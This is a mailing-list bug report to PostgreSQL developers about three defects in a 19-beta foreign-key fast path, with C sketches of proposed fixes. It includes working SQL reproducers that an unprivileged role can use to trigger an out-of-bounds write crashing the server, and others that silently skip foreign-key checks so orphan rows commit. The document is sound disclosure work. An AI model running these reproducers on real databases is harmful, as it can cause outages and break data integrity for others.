From: Nikolay Samokhvalov
Date: Sat, 6 Jun 2026 01:30:51 -0700
Subject: PG19 FK fast path: OOB write and missed FK checks during batched
To: pgsql-hackers mailing list
Cc: Andrey Borodin, Kirk Wolak, amitlangote09@gmail.com

Hi hackers,

The new FK existence-check fast path in ri_triggers.c (ri_FastPath*) runs
user-defined code in the middle of a deferred batch flush. This yields at
least three defects reachable by an unprivileged table owner. They are
present in master and verified in REL_19_BETA1.

I identified these issues during recent security research with LLMs.
Although they have clear security implications (OOB write, integrity
bypass), I am reporting them here because they are isolated to 19beta1 and
absent in PG18 and earlier. I don't have patches, only reproducers.

Mechanism:

For an INSERT/UPDATE on the referencing side, the fast path buffers rows in
a transaction-lived cache (ri_fastpath_cache, keyed by pg_constraint OID)
and probes the PK index in groups. It flushes when a per-constraint buffer
reaches RI_FASTPATH_BATCH_SIZE (64) or when the trigger-firing pass ends
(ri_FastPathEndBatch, an AfterTriggerBatchCallback).
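As a rough illustration of that buffering, here is a minimal C model of a single per-constraint entry. It assumes int FK values and reduces the PK-index probe to counters. FpEntry, fp_add, fp_flush and fp_end_batch are hypothetical names, not the ri_triggers.c API; only RI_FASTPATH_BATCH_SIZE (64) is taken from the description above.

```c
#include <assert.h>

#define RI_FASTPATH_BATCH_SIZE 64

/* Hypothetical stand-in for one per-constraint cache entry. */
typedef struct FpEntry {
    int  batch[RI_FASTPATH_BATCH_SIZE]; /* buffered FK values */
    int  batch_count;                   /* rows currently buffered */
    int  flushes;                       /* probe rounds so far */
    long probed;                        /* rows probed so far */
} FpEntry;

/* Probe everything buffered in one round, then empty the buffer. */
static void fp_flush(FpEntry *e)
{
    if (e->batch_count == 0)
        return;
    /* Real code probes the PK index for batch[0 .. batch_count - 1] here,
       calling the cast and equality functions for a cross-type FK. */
    e->flushes++;
    e->probed += e->batch_count;
    e->batch_count = 0;
}

/* Per-row AFTER trigger: buffer the value, flush once the batch is full. */
static void fp_add(FpEntry *e, int value)
{
    assert(e->batch_count < RI_FASTPATH_BATCH_SIZE);
    e->batch[e->batch_count++] = value;
    if (e->batch_count == RI_FASTPATH_BATCH_SIZE)
        fp_flush(e);
}

/* End of the trigger-firing pass: flush whatever is left over. */
static void fp_end_batch(FpEntry *e)
{
    fp_flush(e);
}
```

With this model, buffering 130 rows produces two full-batch flushes of 64 rows each and leaves 2 rows for the end-of-pass flush.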
For a cross-type FK, the flush calls the column's cast function
(ri_FastPathFlushArray, the FunctionCall3 at line 3069) and the equality
operator: arbitrary user code, mid-flush. Line numbers below are from a
REL_19_BETA1 build (commit 4b0bf07).

Unprivileged vehicle (defects 1 and 3). No superuser, no contrib: a role
creates a type it owns and an IMPLICIT cast from it to the PK type with a
PL/pgSQL function, which ri_HashCompareOp wires into the fast path's cast
slot. The examples below use a composite type, the default btree opclass
and an ordinary single-column FK. No GUC is involved: the fast path is
unconditional for non-partitioned, non-temporal FKs (per
ri_fastpath_is_applicable).

1) ri_FastPathBatchAdd (line 2859): out-of-bounds write on re-entry

The write precedes the bound check, and batch_count is reset to 0 only at
the end of the flush (ri_FastPathBatchFlush, line 2971), so it stays at 64
throughout a full-batch flush:

    fpentry->batch[fpentry->batch_count] = ExecCopySlotHeapTuple(newslot);
    fpentry->batch_count++;
    if (fpentry->batch_count >= RI_FASTPATH_BATCH_SIZE)
        ri_FastPathBatchFlush(fpentry, fk_rel, riinfo);

There is no re-entrancy guard, and ri_FastPathGetEntry returns the same
entry. User code that does DML on the same table during a full-batch flush
therefore re-enters with batch_count == 64 and writes batch[64], one past
the end of the array, overwriting the adjacent batch_count field (struct
layout, lines 250-251). A single re-entrant row only stomps batch_count,
which is then reset to 0 before reuse. The crash manifests once the
re-entrant insert is itself large enough to fill and flush a batch, so that
the stomped batch_count is used as an array index (batch[garbage]) and as
nvals in memset(matched, 0, nvals * sizeof(bool)) (line 3054).
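The first remedy listed under "Root cause / thoughts" (check before writing, plus a per-entry "flushing" flag) could look roughly like the C sketch below. It is a model under stated assumptions, not a patch: rows are ints; GuardedEntry, guarded_add and guarded_flush are hypothetical stand-ins for RI_FastPathEntry, ri_FastPathBatchAdd and ri_FastPathBatchFlush; and demo_flush_hook is a hypothetical stand-in for user cast code that, like vcast() in the reproduction, adds another row to the same entry mid-flush. Both checks run before the write, so the re-entrant add is rejected instead of landing in batch[64].

```c
#include <assert.h>
#include <stdbool.h>

#define RI_FASTPATH_BATCH_SIZE 64

/* Hypothetical model of a cache entry; not the real RI_FastPathEntry. */
typedef struct GuardedEntry {
    int  batch[RI_FASTPATH_BATCH_SIZE];
    int  batch_count;
    bool flushing;          /* proposed flag: true while this entry flushes */
} GuardedEntry;

static int guarded_add(GuardedEntry *e, int row);

/* Result of the re-entrant add attempted by demo_flush_hook. */
static int last_reentry_result = 0;

/* Stand-in for user cast code run mid-flush: it tries to add another
   row to the entry that is currently being flushed. */
static void demo_flush_hook(GuardedEntry *e, int row)
{
    if (row == RI_FASTPATH_BATCH_SIZE - 1)
        last_reentry_result = guarded_add(e, 1000);
}

static void guarded_flush(GuardedEntry *e)
{
    assert(!e->flushing);
    e->flushing = true;
    for (int i = 0; i < e->batch_count; i++)
        demo_flush_hook(e, e->batch[i]);    /* real code: cast + PK probe */
    e->batch_count = 0;                     /* reset only at end of flush */
    e->flushing = false;
}

/* Returns 0 if the row was buffered, -1 if it was rejected.  Real code
   would raise an error instead, and would then also have to clear
   'flushing' during abort cleanup. */
static int guarded_add(GuardedEntry *e, int row)
{
    if (e->flushing)
        return -1;                          /* re-entry into a busy entry */
    if (e->batch_count >= RI_FASTPATH_BATCH_SIZE)
        return -1;                          /* bound check before the write */
    e->batch[e->batch_count++] = row;
    if (e->batch_count >= RI_FASTPATH_BATCH_SIZE)
        guarded_flush(e);
    return 0;
}
```

Adding 64 rows fills and flushes the entry; the add attempted from inside the flush returns -1, and batch_count ends at 0 rather than holding a stomped value.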
Reproduction (non-superuser; reliable SIGSEGV on --enable-cassert -O0;
under -O2 the effect of the out-of-bounds write is undefined):

    create table parent(id int primary key);
    insert into parent select g from generate_series(1,2000) g;
    create type vch as (v int);
    create function vcast(vch) returns int language plpgsql as $$
    begin
      if $1.v = 64 then
        insert into child select row(g)::vch from generate_series(1001,1064) g;
      end if;
      return $1.v;
    end$$;
    create cast (vch as int) with function vcast(vch) as implicit;
    create table child(a vch);
    alter table child add constraint child_fkey
      foreign key (a) references parent(id);
    insert into child select row(g)::vch from generate_series(1,64) g;  -- crash
    -- gdb: crash at ri_FastPathBatchAdd line 2866 with batch_count holding a
    -- stomped HeapTuple pointer's low bits, i.e. batch[64] overwrote
    -- batch_count; the backend SIGSEGVs and the cluster restarts.

2) ri_FastPathSubXactCallback (line 4208): batch dropped on subxact abort

On SUBXACT_EVENT_ABORT_SUB the callback discards the whole cache:

    ri_fastpath_cache = NULL;
    ri_fastpath_callback_registered = false;

But batch[] holds outstanding rows of the enclosing transaction, not of the
aborting subxact. An internal subxact abort during after-trigger firing
(PL/pgSQL BEGIN ... EXCEPTION) drops the buffered rows unflushed: their FK
checks never run, and the orphans commit behind a constraint that still
reports itself valid.
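The "track the buffering subxact" option from the list at the end of this mail can be modeled in C as follows. Assumptions: each buffered row records the subtransaction nesting level current when it was queued (a real patch might take it from GetCurrentTransactionNestLevel(), but that is a guess); rows queued inside an aborted subxact need no check because their tuples are dead; and BufferedRow, SubxactAwareEntry and the entry_* functions are hypothetical. Abort drops only rows at the aborting level or deeper, and subcommit hands such rows to the parent level so that a later sibling abort cannot drop them.

```c
#include <assert.h>

#define RI_FASTPATH_BATCH_SIZE 64

/* Hypothetical buffered row: the FK value plus the subtransaction
   nesting level that was current when the row was queued. */
typedef struct BufferedRow {
    int value;
    int nest_level;
} BufferedRow;

typedef struct SubxactAwareEntry {
    BufferedRow batch[RI_FASTPATH_BATCH_SIZE];
    int         batch_count;
} SubxactAwareEntry;

static void entry_add(SubxactAwareEntry *e, int value, int nest_level)
{
    assert(e->batch_count < RI_FASTPATH_BATCH_SIZE);
    e->batch[e->batch_count].value = value;
    e->batch[e->batch_count].nest_level = nest_level;
    e->batch_count++;
}

/* Subxact at 'level' aborted: drop only rows queued at that level or
   deeper, keeping the enclosing transaction's rows in order. */
static void entry_abort_subxact(SubxactAwareEntry *e, int level)
{
    int kept = 0;

    for (int i = 0; i < e->batch_count; i++)
        if (e->batch[i].nest_level < level)
            e->batch[kept++] = e->batch[i];
    e->batch_count = kept;
}

/* Subxact at 'level' committed: its rows now belong to the parent. */
static void entry_commit_subxact(SubxactAwareEntry *e, int level)
{
    for (int i = 0; i < e->batch_count; i++)
        if (e->batch[i].nest_level >= level)
            e->batch[i].nest_level = level - 1;
}
```

In the reproduction that follows, the buffered rows belong to the top-level transaction, so aborting the EXCEPTION block's subxact would leave them queued and their FK checks would still run.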
No cast is needed to reproduce this defect:

    create table pk(id int primary key);
    create table fk(a int, tag text);
    insert into pk select g from generate_series(1,10) g;
    alter table fk add constraint fk_a_fkey foreign key (a) references pk(id);
    create function abort_subxact() returns trigger language plpgsql as $$
    begin
      if NEW.tag = 'boom' then
        begin perform 1/0; exception when others then null; end;
      end if;
      return NEW;
    end$$;
    create trigger fk_after after insert on fk
      for each row execute function abort_subxact();
    insert into fk values (999,'bad'),(0,'boom'),(1,'ok'),(2,'ok'),(3,'ok');
    -- INSERT 0 5, no error
    select f.a from fk f left join pk p on f.a=p.id where p.id is null;
    --   a
    -- -----
    --  999
    --    0    (orphans)
    -- the constraint still reports itself valid, and re-validation passes
    -- while the orphans remain:
    select convalidated from pg_constraint where conname = 'fk_a_fkey';
    --  convalidated
    -- --------------
    --  t
    alter table fk validate constraint fk_a_fkey;
    -- ALTER TABLE    (succeeds; does not re-scan committed rows)
    select f.a from fk f left join pk p on f.a=p.id where p.id is null;
    -- 999, 0  (orphans still present)

The controls (no EXCEPTION block; a between-statement SAVEPOINT; DEFERRABLE
INITIALLY DEFERRED) all behave correctly: the FK violation is raised and no
orphans remain. The whole statement's buffered batch is discarded, not just
the aborting row's check. The abort path also emits "WARNING: resource was
not closed" (relation / index / TupleDesc), a resource leak consistent with
the missing flush.

3) ri_FastPathEndBatch (line 4133): cross-table re-entry drops a check

EndBatch flushes by iterating the cache with hash_seq_search (line 4143).
If flush-time user code INSERTs into a different fast-path FK table,
ri_FastPathGetEntry adds a new cache entry mid-scan. That entry can land in
a bucket hash_seq_search has already passed, in which case it is never
reached. ri_FastPathTeardown (line 4165) then hash_destroys the cache
(line 4188) without flushing entries that still have batch_count > 0, so
that buffered check is discarded.
This survives a per-entry guard for [1] (it is a different entry, not a
re-entry of the busy one):

    create table parent(id int primary key);
    insert into parent select g from generate_series(1,64) g;
    create table child2(a int);
    alter table child2 add constraint child2_fkey
      foreign key (a) references parent(id);
    create type vch as (v int);
    create function vcast(vch) returns int language plpgsql as $$
    begin
      if $1.v = 1 then
        insert into child2 values (999999);   -- orphan into a *different* FK
      end if;
      return $1.v;
    end$$;
    create cast (vch as int) with function vcast(vch) as implicit;
    create table child(a vch);
    alter table child add constraint child_fkey
      foreign key (a) references parent(id);
    insert into child values (row(1)::vch);   -- flushed at ri_FastPathEndBatch
    select a from child2 where a not in (select id from parent);  -- => 999999
    -- control: INSERT INTO child2 VALUES (999999); -- correctly raises FK error

Root cause / thoughts:

All three stem from invoking user cast/operator code inside a deferred batch
flush: while a per-entry batch is half-updated [1]; while a cache-wide
hash_seq_search is in progress and teardown drops non-empty entries [3];
and against a subxact-abort invalidation that cannot tell parent-xact rows
from aborted-subxact rows [2].

- [1] Bound-check before the write in ri_FastPathBatchAdd, and add a
  "flushing" flag to RI_FastPathEntry that rejects re-entrant modification
  of a busy entry (a nested per-row probe is unsafe: the flush may hold
  PK-index buffer locks).
- [3] Loop-flush in ri_FastPathEndBatch until no entry has
  batch_count > 0, and/or flush non-empty entries in ri_FastPathTeardown
  before hash_destroy.
- [2] Do not discard outstanding parent-xact rows on SUBXACT_EVENT_ABORT_SUB;
  track the buffering subxact, or flush immediate-constraint batches at
  subxact boundaries.
- Unifying: a global "in fast-path flush" guard that routes any re-entrant
  FK check to the immediate per-row path, plus reconsidering whether to run
  user code mid-flush at all.
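The loop-flush remedy for [3] can be illustrated with a toy cache in C. Assumptions: an 8-slot array indexed by key % 8 stands in for the dynahash table and its hash_seq_search order; keys stand in for constraint OIDs; and demo_hook is a hypothetical stand-in for vcast() in the third reproduction, buffering one row for a second constraint (key 2) whose slot the scan has already passed while key 5 is being flushed. None of these names come from ri_triggers.c.

```c
#include <assert.h>
#include <stdbool.h>

#define NSLOTS 8

/* Toy cache entry; 'key' stands in for the constraint OID. */
typedef struct CacheEntry {
    bool     used;
    unsigned key;
    int      batch_count;   /* rows still waiting for an FK check */
    int      flushed_rows;  /* rows whose check has run */
} CacheEntry;

typedef struct Cache {
    CacheEntry slot[NSLOTS];
} Cache;

/* Find or create the entry for 'key' (no collisions in this toy). */
static CacheEntry *cache_get(Cache *c, unsigned key)
{
    CacheEntry *e = &c->slot[key % NSLOTS];

    if (!e->used) {
        e->used = true;
        e->key = key;
        e->batch_count = 0;
        e->flushed_rows = 0;
    }
    assert(e->key == key);
    return e;
}

/* Flushing key 5 runs "user code" that buffers a row for key 2. */
static void demo_hook(Cache *c, unsigned key)
{
    if (key == 5)
        cache_get(c, 2)->batch_count++;
}

static void entry_flush(Cache *c, CacheEntry *e)
{
    e->flushed_rows += e->batch_count;
    e->batch_count = 0;
    demo_hook(c, e->key);           /* user code runs during the flush */
}

/* One scan, like a single hash_seq_search loop: can miss new entries. */
static void end_batch_single_pass(Cache *c)
{
    for (int i = 0; i < NSLOTS; i++)
        if (c->slot[i].used && c->slot[i].batch_count > 0)
            entry_flush(c, &c->slot[i]);
}

/* Proposed: rescan until a full pass finds nothing left to flush. */
static void end_batch_until_empty(Cache *c)
{
    bool flushed_any;

    do {
        flushed_any = false;
        for (int i = 0; i < NSLOTS; i++)
            if (c->slot[i].used && c->slot[i].batch_count > 0) {
                entry_flush(c, &c->slot[i]);
                flushed_any = true;
            }
    } while (flushed_any);
}
```

A single pass leaves key 2's row buffered, which is the check ri_FastPathTeardown would then discard; the loop picks it up on its second pass. The loop only terminates if flush-time code eventually stops buffering new rows, so it may still need a guard such as the one in the last bullet.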
Nik